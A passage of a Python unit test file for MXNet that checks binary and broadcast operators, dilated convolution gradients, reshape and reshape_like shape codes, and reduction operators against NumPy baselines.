[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
        # Generate random data that has ndim between 1 and 5 and all the shape dims between 1 and 5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
    d = gen_broadcast_data(idx)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
    d = gen_binary_data(dummy)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
            logging.error('input b hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
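# check_binary_op_backward feeds a random head gradient through the symbol and
# compares against the analytic gradients returned by `baseline`; reduce_op sums the
# full-shape analytic gradient over every broadcast axis so it can be compared with
# the gradient MXNet accumulates into the (smaller) input-shaped arrays.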
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
        is no gradient definition at those singularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
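# Impulse-response check for (dilated) Convolution: a single unit spike convolved with
# an all-ones kernel must give an output and an input gradient whose sums both equal
# prod(kernel_shape); afterwards, with an all-ones input, adding the computed kernel
# gradient to a random kernel should raise the output at the spike location by
# approximately the gradient's sum (a first-order consistency check).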
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
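# test_reshape exercises the special codes accepted by Reshape's shape argument:
# 0 copies the corresponding input dimension, -1 infers a single dimension, -2 copies
# all remaining dimensions, -3 merges two consecutive dimensions and -4 splits one
# dimension into the two values that follow it; with reverse=True the codes are
# applied from the right. The old target_shape API and Flatten are checked as well.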
@with_seed()
def test_reshape():
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
# Test new api (Using shape)
test_cases = [
[(2, 3, 5, 5), (0, -1), False, (2, 75)],
[(2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)],
[(5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)],
[(2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)],
[(2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)],
[(2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)],
[(2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)],
[(2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)],
[(2, 3, 5, 6), (-3, -3), False, (6, 30)],
[(2, 3, 5, 6), (-3, -1), False, (6, 30)],
[(64,), (-4, 16, 4), False, (16, 4)],
[(64,), (-4, 16, -1), False, (16, 4)],
[(64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)],
[(2, 3, 5, 5), (0, -1), True, (5, 30)],
[(2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)],
[(5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)],
[(2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)],
[(2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)],
[(2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)],
[(2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)],
[(2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)],
[(2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)],
[(2, 3, 5, 6), (-3, -3), True, (6, 30)],
[(64,), (16, 4, -4), True, (16, 4)],
[(64,), (16, -1, -4), True, (16, 4)],
[(1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16)]]
for test_case in test_cases:
test_reshape_new(*test_case)
# Test old api
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
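# reshape_like with lhs_begin/lhs_end/rhs_begin/rhs_end replaces the lhs dimensions in
# [lhs_begin, lhs_end) with the rhs dimensions in [rhs_begin, rhs_end); negative and
# None bounds are accepted, and the element count of the replaced slice must be
# preserved. The plain two-argument form reshapes lhs to the full shape of rhs.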
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
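# test_reduce compares each reduction operator with np_reduce and its gradient with a
# hand-written rule: sum broadcasts the head gradient, mean also divides by the
# reduction size, prod multiplies by outdata / data, nansum / nanprod zero the
# gradient at NaN positions, max / min route the gradient to the extremal elements,
# and norm scales it by data / outdata.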
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
            # Generate random data that has ndim between 1 and 5 and all the shape dims between 1 and 5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
        # Generate random data that has ndim between 1 and 5 and all the shape dims between 1 and 5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
